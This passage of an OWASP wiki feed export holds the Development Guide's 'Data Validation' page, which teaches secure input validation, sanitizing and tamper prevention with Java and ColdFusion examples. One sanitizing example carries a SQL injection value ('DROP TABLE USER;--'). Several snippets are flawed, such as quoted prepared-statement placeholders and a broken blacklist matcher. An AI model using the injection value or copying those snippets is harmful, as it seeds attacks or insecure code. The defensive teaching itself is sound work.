&amp;lt;cfargument name=&amp;quot;logintype&amp;quot; type=&amp;quot;string&amp;quot; required=&amp;quot;yes&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfif isDefined(&amp;quot;form.logout&amp;quot;)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cflogout&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset StructClear(Session)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cflog text=&amp;quot;#getAuthUser()# has been logged out.&amp;quot; &lt;br /&gt;
&lt;br /&gt;
		type=&amp;quot;Information&amp;quot; &lt;br /&gt;
&lt;br /&gt;
		file=&amp;quot;access&amp;quot; &lt;br /&gt;
&lt;br /&gt;
		application=&amp;quot;yes&amp;quot;&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfif arguments.logintype eq &amp;quot;challenge&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset foo = closeBrowser()&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfelse&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!--- replace this URL to a page logged out users should see ---&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cflocation url=&amp;quot;login.cfm&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cffunction&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Error Handling]]&lt;br /&gt;
[[Category:Logging]]&lt;br /&gt;
[[Category:OWASP Logging Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Data_Validation&amp;diff=59754</id>
		<title>Data Validation</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Data_Validation&amp;diff=59754"/>
				<updated>2009-05-01T12:13:21Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Data Validation and Interpreter Injection */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that the application is robust against all forms of input data, whether obtained from the user, infrastructure, external entities or database systems.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
All. &lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS11 – Manage Data. All sections should be reviewed&lt;br /&gt;
&lt;br /&gt;
==Description ==&lt;br /&gt;
&lt;br /&gt;
The most common web application security weakness is the failure to properly validate input from the client or environment. This weakness leads to almost all of the major vulnerabilities in applications, such as [[Interpreter Injection]], locale/Unicode attacks, file system attacks and buffer overflows. Data from the client should never be trusted for the client has every possibility to tamper with the data.&lt;br /&gt;
&lt;br /&gt;
In many cases, [[Encoding]] has the potential to defuse attacks that rely on lack of input validation. For example, if you use HTML entity encoding on user input before it is sent to a browser, it will prevent most [[Cross-site Scripting (XSS)|XSS]] attacks. However, simply preventing attacks is not enough - you must perform [[Intrusion Detection]] in your applications. Otherwise, you are allowing attackers to repeatedly attack your application until they find a vulnerability that you haven't protected against. Detecting attempts to find these weaknesses is a critical protection mechanism.&lt;br /&gt;
&lt;br /&gt;
==Definitions ==&lt;br /&gt;
&lt;br /&gt;
These definitions are used within this document:&lt;br /&gt;
&lt;br /&gt;
* '''Integrity checks'''&lt;br /&gt;
&lt;br /&gt;
Ensure that the data has not been tampered with and is the same as before&lt;br /&gt;
&lt;br /&gt;
* '''Validation'''&lt;br /&gt;
&lt;br /&gt;
Ensure that the data is strongly typed, correct syntax, within length boundaries, contains only permitted characters, or that numbers are correctly signed and within range boundaries &lt;br /&gt;
&lt;br /&gt;
* '''Business rules'''&lt;br /&gt;
&lt;br /&gt;
Ensure that data is not only validated, but business rule correct. For example, interest rates fall within permitted boundaries.&lt;br /&gt;
&lt;br /&gt;
Some documentation and references interchangeably use the various meanings, which is very confusing to all concerned. This confusion directly causes continuing financial loss to the organization. &lt;br /&gt;
&lt;br /&gt;
==Where to include integrity checks ==&lt;br /&gt;
&lt;br /&gt;
Integrity checks must be included wherever data passes from a trusted to a less trusted boundary, such as from the application to the user's browser in a hidden field, or to a third party payment gateway, such as a transaction ID used internally upon return. &lt;br /&gt;
&lt;br /&gt;
The type of integrity control (checksum, HMAC, encryption, digital signature) should be directly related to the risk of the data transiting the trust boundary. &lt;br /&gt;
&lt;br /&gt;
==Where to include validation ==&lt;br /&gt;
&lt;br /&gt;
Validation must be performed on every tier. However, validation should be performed as per the function of the server executing the code. For example, the web / presentation tier should validate for web related issues, persistence layers should validate for persistence issues such as SQL / HQL injection, directory lookups should check for LDAP injection, and so on.&lt;br /&gt;
&lt;br /&gt;
==Where to include business rule validation ==&lt;br /&gt;
&lt;br /&gt;
Business rules are known during design, and they influence implementation. However, there are bad, good and &amp;quot;best&amp;quot; approaches. Often the best approach is the simplest in terms of code. &lt;br /&gt;
&lt;br /&gt;
===Example - Scenario ===&lt;br /&gt;
&lt;br /&gt;
* You are to populate a list with accounts provided by the back-end system&lt;br /&gt;
* The user will choose an account, choose a biller, and press next&lt;br /&gt;
&lt;br /&gt;
===Wrong way===&lt;br /&gt;
&lt;br /&gt;
The account select option is read directly and provided in a message back to the backend system without validating the account number if one of the accounts provided by the backend system.&lt;br /&gt;
&lt;br /&gt;
===Why this is bad===&lt;br /&gt;
&lt;br /&gt;
An attacker can change the HTML in any way they choose:&lt;br /&gt;
&lt;br /&gt;
* The lack of validation requires a round-trip to the backend to provide an error message that the front end code could easily have eliminated&lt;br /&gt;
&lt;br /&gt;
* The back end may not be able to cope with the data payload the front-end code could have easily eliminated. For example, buffer overflows, XML injection, or similar. &lt;br /&gt;
&lt;br /&gt;
===Acceptable Method ===&lt;br /&gt;
&lt;br /&gt;
The account select option parameter (&amp;quot;payee_id&amp;quot;) is read by the code, and compared to an already-known list. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
if (account.hasPayee( session.getParameter(&amp;quot;payee_id&amp;quot;) )) {&lt;br /&gt;
    backend.performTransfer( session.getParameter(&amp;quot;payee_id&amp;quot;) );&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This prevents parameter tampering, but requires the list of possible payee_id's to be to be calculated beforehand.&lt;br /&gt;
&lt;br /&gt;
===Best Method ===&lt;br /&gt;
&lt;br /&gt;
The original code emitted indexes &amp;lt;option value=&amp;quot;1&amp;quot; ... &amp;gt; rather than account names.&lt;br /&gt;
&lt;br /&gt;
''int payeeLstId = session.getParameter('payeelstid');''&lt;br /&gt;
&lt;br /&gt;
''accountFrom = account.getAcctNumberByIndex(payeeLstId);''&lt;br /&gt;
&lt;br /&gt;
Not only is this easier to render in HTML, it makes validation and business rule validation trivial. The field cannot be tampered with.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- dkaplan: why is this the best?  I can see how it can make things easier to guess.  Where before I had to guess an account name, now I can just put in 9 if I see a list of id's from 1-8 and this code example doesn't directly check the integrity of that.  I think this needs more explanation. --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Conclusion ===&lt;br /&gt;
&lt;br /&gt;
To provide defense in depth and to prevent attack payloads from trust boundaries, such as backend hosts, which are probably incapable of handling arbitrary input data, business rule validation is to be performed (preferably in workflow or command patterns), even if it is known that the back end code performs business rule validation.&lt;br /&gt;
&lt;br /&gt;
This is not to say that the entire set of business rules need be applied - it means that the fundamentals are performed to prevent unnecessary round trips to the backend and to prevent the backend from receiving most tampered data.&lt;br /&gt;
&lt;br /&gt;
==Data Validation Strategies ==&lt;br /&gt;
&lt;br /&gt;
There are four strategies for validating data, and they should be used in this order:&lt;br /&gt;
&lt;br /&gt;
===Accept known good===&lt;br /&gt;
&lt;br /&gt;
This strategy is also known as &amp;quot;whitelist&amp;quot; or &amp;quot;positive&amp;quot; validation. The idea is that you should check that the data is one of a set of tightly constrained known good values. Any data that doesn't match should be rejected.  Data should be:&lt;br /&gt;
&lt;br /&gt;
* Strongly typed at all times&lt;br /&gt;
* Length checked and fields length minimized&lt;br /&gt;
* Range checked if a numeric&lt;br /&gt;
* Unsigned unless required to be signed&lt;br /&gt;
* Syntax or grammar should be checked prior to first use or inspection&lt;br /&gt;
&lt;br /&gt;
If you expect a postcode, validate for a postcode (type, length and syntax):&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
public String isPostcode(String postcode) {&lt;br /&gt;
    return (postcode != null &amp;amp;&amp;amp; Pattern.matches(&amp;quot;^(((2|8|9)\d{2})|((02|08|09)\d{2})|([1-9]\d{3}))$&amp;quot;, postcode)) ? postcode : &amp;quot;&amp;quot;;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Coding guidelines should use some form of visible tainting on input from the client or untrusted sources, such as third party connectors to make it obvious that the input is unsafe:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
String taintPostcode = request.getParameter(&amp;quot;postcode&amp;quot;);&lt;br /&gt;
ValidationEngine validator = new ValidationEngine();&lt;br /&gt;
boolean isValidPostcode = validator.isPostcode(taintPostcode);&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Reject known bad===&lt;br /&gt;
&lt;br /&gt;
This strategy, also known as &amp;quot;negative&amp;quot; or &amp;quot;blacklist&amp;quot; validation is a weak alternative to positive validation. Essentially, if you don't expect to see characters such as %3f or JavaScript or similar, reject strings containing them. This is a dangerous strategy, because the set of possible bad data is potentially infinite. Adopting this strategy means that you will have to maintain the list of &amp;quot;known bad&amp;quot; characters and patterns forever, and you will by definition have incomplete protection.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
public String removeJavascript(String input) {&lt;br /&gt;
&lt;br /&gt;
Pattern p = Pattern.compile(&amp;quot;javascript&amp;quot;, CASE_INSENSITIVE);&lt;br /&gt;
&lt;br /&gt;
p.matcher(input);&lt;br /&gt;
&lt;br /&gt;
return (!p.matches()) ? input : '';&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
[[Category:FIXME|Is the CSS Cheat Sheet in the current development guide? I wanted to link to that and couldn't find it ]]&lt;br /&gt;
It can take upwards of 90 regular expressions (see the CSS Cheat Sheet in the Development Guide 2.0) to eliminate known malicious software, and each regex needs to be run over every field. Obviously, this is slow and not secure. Just rejecting &amp;quot;current known bad&amp;quot; (which is at the time of writing hundreds of strings and literally millions of combinations) is insufficient if the input is a string. This strategy is directly akin to anti-virus pattern updates. Unless the business will allow updating &amp;quot;bad&amp;quot; regexes on a daily basis and support someone to research new attacks regularly, this approach will be obviated before long.&lt;br /&gt;
&lt;br /&gt;
===Sanitize===&lt;br /&gt;
&lt;br /&gt;
Rather than accept or reject input, another option is to change the user input into an acceptable format&lt;br /&gt;
&lt;br /&gt;
==== Sanitize with Whitelist ====&lt;br /&gt;
&lt;br /&gt;
Any characters which are not part of an approved list can be removed, encoded or replaced.&lt;br /&gt;
&lt;br /&gt;
Here are some examples:&lt;br /&gt;
&lt;br /&gt;
If you expect a phone number, you can strip out all non-digit characters.  Thus, &amp;quot;(555)123-1234&amp;quot;, &amp;quot;555.123.1234&amp;quot;, and &amp;quot;555\&amp;quot;;DROP TABLE USER;--123.1234&amp;quot; all convert to 5551231234.  Note that you should proceed to validate the resulting numbers as well.  As you see, this is not only beneficial for security, but it also allows you to accept and use a wider range of valid user input.&lt;br /&gt;
&lt;br /&gt;
If you want text from a user comment form, it is difficult to decide on a legitimate set of characters because nearly every character has a legitimate use.  One solution is to replace all non alphanumeric characters with an encoded version, so &amp;quot;I like your web page&amp;quot;, might emerge from your sanitation routines as &amp;quot;I+like+your+web+page%21&amp;quot;.  (This example uses [http://en.wikipedia.org/wiki/Url_encoding URL encoding].)&lt;br /&gt;
&lt;br /&gt;
You can also go one step further.  Say you want to set up a site where users can upload arbitrary files so they can share them or download them again from another location.  In this case validation is impossible because there is no valid or invalid content.  Because your only concern is protecting your app from malicious input and you don't need to actually do anything except accept, store and transmit the file, you can encode the entire file in, say  [http://en.wikipedia.org/wiki/Base64 base 64].  &lt;br /&gt;
&lt;br /&gt;
==== Sanitize with Blacklist ====&lt;br /&gt;
&lt;br /&gt;
Eliminate or translate characters (such as to HTML entities or to remove quotes) in an effort to make the input &amp;quot;safe&amp;quot;. &lt;br /&gt;
Like blacklists, this approach requires maintenance and is usually incomplete. As most fields have a particular grammar, it is simpler, faster, and more secure to simply validate a single correct positive test than to try to include complex and slow sanitization routines for all current and future attacks.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
public String quoteApostrophe(String input) {&lt;br /&gt;
    if (input != null)&lt;br /&gt;
        return input.replaceAll(&amp;quot;[\']&amp;quot;, &amp;quot;&amp;amp;amp;rsquo;&amp;quot;);&lt;br /&gt;
    else&lt;br /&gt;
        return null;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===No validation===&lt;br /&gt;
&lt;br /&gt;
This is inherently unsafe and strongly discouraged. The business must sign off each and every example of no validation as the lack of validation usually leads to direct obviation of application, host and network security controls.&lt;br /&gt;
&lt;br /&gt;
 account.setAcctId(getParameter('formAcctNo'));&lt;br /&gt;
 ...&lt;br /&gt;
 &lt;br /&gt;
 public setAcctId(String acctId) {&lt;br /&gt;
 	cAcctId = acctId;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
==Prevent parameter tampering ==&lt;br /&gt;
&lt;br /&gt;
There are many input sources:&lt;br /&gt;
&lt;br /&gt;
* HTTP headers, such as REMOTE_ADDR, PROXY_VIA or similar&lt;br /&gt;
&lt;br /&gt;
* Environment variables, such as getenv() or via server properties &lt;br /&gt;
&lt;br /&gt;
* All GET, POST and Cookie data&lt;br /&gt;
&lt;br /&gt;
This includes supposedly tamper resistant fields such as radio buttons, drop downs, etc - any client side HTML can be re-written to suit the attacker&lt;br /&gt;
&lt;br /&gt;
Configuration data (mistakes happen :))&lt;br /&gt;
&lt;br /&gt;
External systems (via any form of input mechanism, such as XML input, RMI, web services, etc)&lt;br /&gt;
&lt;br /&gt;
All of these data sources supply untrusted input. Data received from untrusted data sources must be properly checked before first use.&lt;br /&gt;
&lt;br /&gt;
==Hidden fields ==&lt;br /&gt;
&lt;br /&gt;
Hidden fields are a simple way to avoid storing state on the server. Their use is particularly prevalent in &amp;quot;wizard-style&amp;quot; multi-page forms. However, their use exposes the inner workings of your application, and exposes data to trivial tampering, replay, and validation attacks. In general, only use hidden fields for page sequence.&lt;br /&gt;
&lt;br /&gt;
If you have to use hidden fields, there are some rules:&lt;br /&gt;
&lt;br /&gt;
* Secrets, such as passwords, should never be sent in the clear&lt;br /&gt;
&lt;br /&gt;
* Hidden fields need to have integrity checks and preferably encrypted using non-constant initialization vectors (i.e. different users at different times have different yet cryptographically strong random IVs)&lt;br /&gt;
&lt;br /&gt;
* Encrypted hidden fields must be robust against replay attacks, which means some form of temporal keying&lt;br /&gt;
&lt;br /&gt;
* Data sent to the user must be validated on the server once the last page has been received, even if it has been previously validated on the server - this helps reduce the risk from replay attacks.&lt;br /&gt;
&lt;br /&gt;
The preferred integrity control should be at least a HMAC using SHA-256 or preferably digitally signed or encrypted using PGP. IBMJCE supports SHA-256, but PGP JCE support require the inclusion of the Legion of the Bouncy Castle (http://www.bouncycastle.org/) JCE classes.&lt;br /&gt;
&lt;br /&gt;
It is simpler to store this data temporarily in the session object. Using the session object is the safest option as data is never visible to the user, requires (far) less code, nearly no CPU, disk or I/O utilization, less memory (particularly on large multi-page forms), and less network consumption. &lt;br /&gt;
&lt;br /&gt;
In the case of the session object being backed by a database, large session objects may become too large for the inbuilt handler. In this case, the recommended strategy is to store the validated data in the database, but mark the transaction as &amp;quot;incomplete.&amp;quot; Each page will update the incomplete transaction until it is ready for submission. This minimizes the database load, session size, and activity between the users whilst remaining tamperproof. &lt;br /&gt;
&lt;br /&gt;
Code containing hidden fields should be rejected during code reviews.&lt;br /&gt;
&lt;br /&gt;
==ASP.NET Viewstate ==&lt;br /&gt;
&lt;br /&gt;
ASP.NET sends form data back to the client in a hidden “Viewstate” field. Despite looking forbidding, this “encryption” is simply plain-text equivalent (base64 encoding) and has no data integrity without further action on your behalf in ASP.NET 1.0. In ASP.NET 1.1 and 2.0, tamper proofing, called &amp;quot;enableViewStateMAC&amp;quot; is on by default using a SHA-1 hash.&lt;br /&gt;
&lt;br /&gt;
Any application framework with a similar mechanism might be at fault – you should investigate your application framework’s support for sending data back to the user. Preferably it should not round trip.&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
These configurations are set hierarchically in the .NET framework. The machine.config file contains the global configuration; each web directory may contain a web.config file further specifying or overriding configuration; each page may contain @page directives specifying same configuration or overrides; you must check all three locations:&lt;br /&gt;
&lt;br /&gt;
* If the enableViewStateMac is not set to “true”, you are at risk if your viewstate contains authorization state&lt;br /&gt;
&lt;br /&gt;
* If the viewStateEncryptionMode is not set to “always”, you are at risk if your viewstate contains secrets such as credentials&lt;br /&gt;
&lt;br /&gt;
* If you share a host with many other customers, you all share the same machine key by default in ASP.NET 1.1. In ASP.NET 2.0, it is possible to configure unique viewstate keys per application&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* If your application relies on data returning from the viewstate without being tampered with, you should turn on viewstate integrity checks at the least, and strongly consider:&lt;br /&gt;
&lt;br /&gt;
* Encrypt viewstate if any of the data is application sensitive&lt;br /&gt;
&lt;br /&gt;
* Upgrade to ASP.NET 2.0 as soon as practical if you are on a shared hosting arrangement&lt;br /&gt;
&lt;br /&gt;
* Move truly sensitive viewstate data to the session variable instead&lt;br /&gt;
&lt;br /&gt;
===Selects, radio buttons, and checkboxes ===&lt;br /&gt;
&lt;br /&gt;
It is a commonly held belief that the value settings for these items cannot be easily tampered. This is wrong. In the following example, actual account numbers are used, which can lead to compromise:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html:radio value=&amp;quot;&amp;lt;%=acct.getCardNumber(1).toString( )%&amp;gt;&amp;quot; property=&amp;quot;acctNo&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;bean:message key=&amp;quot;msg.card.name&amp;quot; arg0=&amp;quot;&amp;lt;%=acct.getCardName(1).toString( )%&amp;gt;&amp;quot; /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html:radio value=&amp;quot;&amp;lt;%=acct.getCardNumber(1).toString( )%&amp;gt;&amp;quot; property=&amp;quot;acctNo&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;bean:message key=&amp;quot;msg.card.name&amp;quot; arg0=&amp;quot;&amp;lt;%=acct.getCardName(2).toString( )%&amp;gt;&amp;quot; /&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This produces (for example):&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;input type=&amp;quot;radio&amp;quot; name=&amp;quot;acctNo&amp;quot; value=&amp;quot;455712341234&amp;quot;&amp;gt;Gold Card&lt;br /&gt;
&lt;br /&gt;
&amp;lt;input type=&amp;quot;radio&amp;quot; name=&amp;quot;acctNo&amp;quot; value=&amp;quot;455712341235&amp;quot;&amp;gt;Platinum Card&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
If the value is retrieved and then used directly in a SQL query, an interesting form of SQL injection may occur: authorization tampering leading to information disclosure. As the connection pool connects to the database using a single user, it may be possible to see other users' accounts if the SQL looks something like this:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
String acctNo = getParameter('acctNo');&lt;br /&gt;
&lt;br /&gt;
String sql = &amp;quot;SELECT acctBal FROM accounts WHERE acctNo = '?'&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
PreparedStatement st = conn.prepareStatement(sql);&lt;br /&gt;
&lt;br /&gt;
st.setString(1, acctNo);&lt;br /&gt;
&lt;br /&gt;
ResultSet rs = st.executeQuery();&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This should be re-written to retrieve the account number via index, and include the client's unique ID to ensure that other valid account numbers are exposed:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&lt;br /&gt;
String acctNo = acct.getCardNumber(getParameter('acctIndex'));&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
String sql = &amp;quot;SELECT acctBal FROM accounts WHERE acct_id = '?' AND acctNo = '?'&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
PreparedStatement st = conn.prepareStatement(sql);&lt;br /&gt;
&lt;br /&gt;
st.setString(1, acct.getID());&lt;br /&gt;
&lt;br /&gt;
st.setString(2, acctNo);&lt;br /&gt;
&lt;br /&gt;
ResultSet rs = st.executeQuery();&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This approach requires rendering input values from 1 to ... x, and assuming accounts are stored in a Collection which can be iterated using logic:iterate:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;logic:iterate id=&amp;quot;loopVar&amp;quot; name=&amp;quot;MyForm&amp;quot; property=&amp;quot;values&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html:radio property=&amp;quot;acctIndex&amp;quot; idName=&amp;quot;loopVar&amp;quot; value=&amp;quot;value&amp;quot;/&amp;gt;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;bean:write name=&amp;quot;loopVar&amp;quot; property=&amp;quot;name&amp;quot;/&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/logic:iterate&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The code will emit HTML with the values &amp;quot;1&amp;quot; .. &amp;quot;x&amp;quot; as per the collection's content. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;input type=&amp;quot;radio&amp;quot; name=&amp;quot;acctIndex&amp;quot; value=&amp;quot;1&amp;quot; /&amp;gt;Gold Credit Card&lt;br /&gt;
&lt;br /&gt;
&amp;lt;input type=&amp;quot;radio&amp;quot; name=&amp;quot;acctIndex&amp;quot; value=&amp;quot;2&amp;quot; /&amp;gt;Platinum Credit Card&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This approach should be used for any input type that allows a value to be set: radio buttons, checkboxes, and particularly select / option lists.&lt;br /&gt;
&lt;br /&gt;
===Per-User Data ===&lt;br /&gt;
&lt;br /&gt;
In fully normalized databases, the aim is to minimize the amount of repeated data. However, some data is inferred. For example, users can see messages that are stored in a messages table. Some messages are private to the user. However, in a fully normalized database, the list of message IDs are kept within another table:&lt;br /&gt;
&amp;lt;!-- dkaplan: IMPORTANT: if users have messages, this is NOT a normalized table, it is denormalized.  If users have messages, it is normalized by putting a userid in the MESSAGES table. This section is claiming the opposite.  --&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
+------------------------+&lt;br /&gt;
|       MESSAGES         |&lt;br /&gt;
+------------------------+&lt;br /&gt;
|  msgid   |   message   |&lt;br /&gt;
+------------------------+&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If a user marks a message for deletion, the usual way is to recover the message ID from the user, and delete that:&lt;br /&gt;
&lt;br /&gt;
 DELETE FROM message WHERE msgid='frmMsgId' &lt;br /&gt;
&lt;br /&gt;
However, how do you know if the user is eligible to delete that message ID? Such tables need to be denormalized slightly to include a user ID or make it easy to perform a single query to delete the message safely. For example, by adding back an (optional) uid column, the delete is now made reasonably safe:&lt;br /&gt;
&lt;br /&gt;
 DELETE FROM message WHERE uid='session.myUserID' and msgid='frmMsgId'; &lt;br /&gt;
&lt;br /&gt;
Where the data is potentially both a private resource and a public resource (for example, in the secure message service, broadcast messages are just a special type of private message), additional precautions need to be taken to prevent users from deleting public resources without authorization. This can be done using role based checks, as well as using SQL statements to discriminate by message type:&lt;br /&gt;
&lt;br /&gt;
 DELETE FROM message  &lt;br /&gt;
 WHERE&lt;br /&gt;
 uid='session.myUserID' AND&lt;br /&gt;
 msgid='frmMsgId' AND&lt;br /&gt;
 broadcastFlag = false;&lt;br /&gt;
&lt;br /&gt;
==URL encoding ==&lt;br /&gt;
&lt;br /&gt;
Data sent via the URL, which is strongly discouraged, should be URL encoded and decoded. This reduces the likelihood of cross-site scripting attacks from working.&lt;br /&gt;
&lt;br /&gt;
In general, do not send data via GET request unless for navigational purposes.&lt;br /&gt;
&lt;br /&gt;
==HTML encoding ==&lt;br /&gt;
&lt;br /&gt;
Data sent to the user needs to be safe for the user to view. This can be done using &amp;lt;bean:write ...&amp;gt; and friends. Do not use &amp;lt;%=var%&amp;gt; unless it is used to supply an argument for &amp;lt;bean:write...&amp;gt; or similar. &lt;br /&gt;
&lt;br /&gt;
HTML encoding translates a range of characters into their HTML entities. For example, &amp;gt; becomes &amp;amp;amp;gt; This will still display as &amp;gt; on the user's browser, but it is a safe alternative.&lt;br /&gt;
&lt;br /&gt;
==Encoded strings ==&lt;br /&gt;
&lt;br /&gt;
Some strings may be received in encoded form. It is essential to send the correct locale to the user so that the web server and application server can provide a single level of canoncalization prior to the first use. &lt;br /&gt;
&lt;br /&gt;
Do not use getReader() or getInputStream() as these input methods do not decode encoded strings. If you need to use these constructs, you must decanoncalize data by hand. &lt;br /&gt;
&lt;br /&gt;
==Data Validation and Interpreter Injection ==&lt;br /&gt;
&lt;br /&gt;
This section focuses on preventing injection in ColdFusion. Interpreter Injection involves manipulating application parameters to execute malicious code on the system. The most prevalent of these is SQL injection but it also includes other injection techniques, including LDAP, ORM, User Agent, XML, etc. – see [[Reviewing_Code_for_OS_Injection|Interpreter Injection]] for greater details. As a developer you should assume that all input is malicious. Before processing any input coming from a user, data source, component, or data service it should be validated for type, length, and/or range. ColdFusion includes support for Regular Expressions and CFML tags that can be used to validate input.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''SQL Injection'''&lt;br /&gt;
&lt;br /&gt;
[[SQL Injection]] involves sending extraneous SQL queries as variables. ColdFusion provides the &amp;lt;cfqueryparam&amp;gt; and &amp;lt;cfprocparam&amp;gt; tags for validating database parameters. These tags nests inside &amp;lt;cfquery&amp;gt; and &amp;lt;cfstoredproc&amp;gt;, respectively. For dynamic SQL submitted in &amp;lt;cfquery&amp;gt;, use the CFSQLTYPE attribute of the &amp;lt;cfqueryparam&amp;gt; to validate variables against the expected database datatype. Similarly, use the CFSQLTYPE attribute of &amp;lt;cfprocparam&amp;gt; to validate the datatypes of stored procedure parameters passed through &amp;lt;cfstoredproc&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
You can also strengthen your systems against SQL Injection by disabling the Allowed SQL operations for individual data sources. See the '''Configuration''' section below for more information.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''LDAP Injection'''&lt;br /&gt;
&lt;br /&gt;
[[LDAP injection]] is an attack used to exploit web based applications that construct LDAP statements based on user input. ColdFusion uses the &amp;lt;cfldap&amp;gt; tag to communicate with LDAP servers. This tag has an ACTION attribute which dictates the query performed against the LDAP. The valid values for this attribute are: add, delete, query (default), modify, and modifyDN. &amp;lt;cfldap&amp;gt; calls are turned into JNDI (Java Naming And Directory Interface) lookups. However, because &amp;lt;cfldap&amp;gt; wraps the calls, it will throw syntax errors if native JNDI code is passed to its attributes making LDAP injection more difficult.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''XML Injection'''&lt;br /&gt;
&lt;br /&gt;
